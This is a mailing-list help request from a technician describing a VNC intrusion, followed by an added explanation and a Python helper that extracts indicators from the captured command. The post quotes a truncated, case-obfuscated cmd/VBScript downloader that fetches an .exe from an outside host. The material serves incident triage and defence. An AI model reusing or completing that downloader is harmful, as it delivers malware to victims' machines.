Hello All.  This is very off topic, but I figure it won't kill anyone  
if I ask.  There are a number of very smart cookies on this list, and  
I bet someone out there can enlighten me.

Today I got a call from one of my customers who runs VNC for remote
support access.  She was working away, and suddenly her mouse
started to move, it opened up a CMD session (it's really a DOS
session, but we aren't supposed to know that Windows is just another
DOS app, are we!!!) and it typed the following:

C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE  
nExt:F="L.eXe":SEt
p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/ 
NETSTAT
On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct 
("mSxmL2.xmLhttp"):p.OpEn"gEt",
"HtTp://WwW.JmDoNgyI.CoM/

Now, I am not an XML guy, but it looks to me like this person was
trying to use XML and download content from a likely infected
website.  I went to the website (I use a Mac, so I don't generally
worry about getting a browser hack) and, you guessed it, it was a
Chinese site.  I googled the www.jmdongyi.com name but got no hits.

I connected to her PC and found no strange connections to it at the
time.  I ran a malware and virus scan and it was clean also.  I had her
turn off VNC for now and explained to her how she could turn it on
when she needs to allow someone access.  Incidentally, she was using
a non-dictionary password with alpha and numeric characters.

My question is, what was the XML string actually trying to do?

Thanks to all who offer assistance.

Chris Curtis
Sandpoint Computers
Office 208-265-1608
Cell 208-610-3062


_______________________________________________
sql-ledger-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
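What the typed fragment was doing, as an added example that is not part of the original message or of any reply to it: the visible piece is cmd.exe changing into %TMP% and ECHOing the beginning of a VBScript that sets On Error Resume Next, stores the name L.eXe in a variable, creates an MSXML2.XMLHTTP object and opens an HTTP GET to www.jmdongyi.com. The rest of the line is cut off in the quote (a downloader of this shape normally goes on to redirect the ECHO into a script file, save the response body and run it, but that is an assumption about what follows, not something the quote shows). The Python triage helper below works only on what is visible: it undoes the randomised casing, splits the VBScript statements on their ':' separators (ignoring the ':' inside the URL), and pulls out the host, the HTTP method, the COM objects and the dropped filename. The sample string is the fragment from the post, left truncated; the COM ProgID list and the scoring threshold are my own choices and not taken from the post.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input: the fragment quoted in the post above. The URL was
# cut off in the original message, so it stays truncated (and unterminated) here.
SAMPLE = ('CD %TMP%&ECHO On ERROR RESUmE nExt:F="L.eXe":SEt '
          'p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/')

# COM ProgIDs that VBScript download-and-run one-liners are typically built
# from. Assumption: this list is mine, not taken from the post.
DOWNLOADER_OBJECTS = {
    "msxml2.xmlhttp", "msxml2.serverxmlhttp", "microsoft.xmlhttp",
    "adodb.stream", "wscript.shell", "scripting.filesystemobject",
}


def split_vbs_statements(script):
    """Split a VBScript line on ':' statement separators, ignoring ':' inside
    string literals (the 'http:' in the URL must not be treated as one)."""
    parts, cur, in_quote = [], [], False
    for ch in script:
        if ch == '"':
            in_quote = not in_quote
        if ch == ':' and not in_quote:
            parts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur).strip())
    return [p for p in parts if p]


def mixed_case_ratio(text):
    """Fraction of adjacent letter pairs whose case differs. Randomised casing
    (used to slip past naive case-sensitive filters) scores far higher than
    anything a person types normally."""
    letters = [c for c in text if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips / (len(letters) - 1)


def analyze(cmd_line):
    """Extract indicators from a cmd.exe line of the form
    'cd <dir>&echo <vbscript...>' and score them."""
    shell_part, _, echoed = cmd_line.partition('&')
    m = re.match(r'\s*echo\s+(.*)', echoed, re.I | re.S)
    script = m.group(1) if m else echoed          # the VBScript being echoed
    lows = script.lower()                         # casing carries no meaning in VBScript

    cd = re.search(r'\bcd\s+(%\w+%|\S+)', shell_part.lower())
    objects = re.findall(r'createobject\s*\(\s*"([^"]+)"\s*\)', lows)
    # XMLHTTP .Open "METHOD","URL": the URL string may be unterminated, so
    # capture up to end of input rather than requiring a closing quote.
    http = re.search(r'\.open\s*"(\w+)"\s*,\s*"([^"]*)', lows)
    url = http.group(2) if http else None
    host = urlsplit(url).hostname if url else None
    dropped = re.findall(r'"([^"]*\.exe)"', lows)
    resume_next = re.search(r'on\s+error\s+resume\s+next', lows) is not None
    ratio = mixed_case_ratio(cmd_line)

    indicators = [
        resume_next,                                      # silence every error
        any(o in DOWNLOADER_OBJECTS for o in objects),    # HTTP/file/shell COM objects
        host is not None,                                 # reaches out to a remote host
        bool(dropped),                                    # names an .exe to write
        ratio > 0.3,                                      # randomised casing
        cd is not None and cd.group(1).startswith('%'),   # works out of an env-var dir
    ]
    return {
        "shell_cd_target": cd.group(1) if cd else None,
        "statements": split_vbs_statements(script),
        "on_error_resume_next": resume_next,
        "com_objects": objects,
        "http_method": http.group(1) if http else None,
        "remote_host": host,
        "dropped_files": dropped,
        "mixed_case_ratio": round(ratio, 2),
        "indicator_count": sum(indicators),
        "suspicious": sum(indicators) >= 3,  # threshold is an assumption of mine
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the captured line, the result gives the two things worth acting on first: the remote host to block at the perimeter and look for in proxy or firewall logs, and the filename (L.exe) to search for under the user's %TMP% directory, since a clean AV scan does not say whether the download ever completed.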
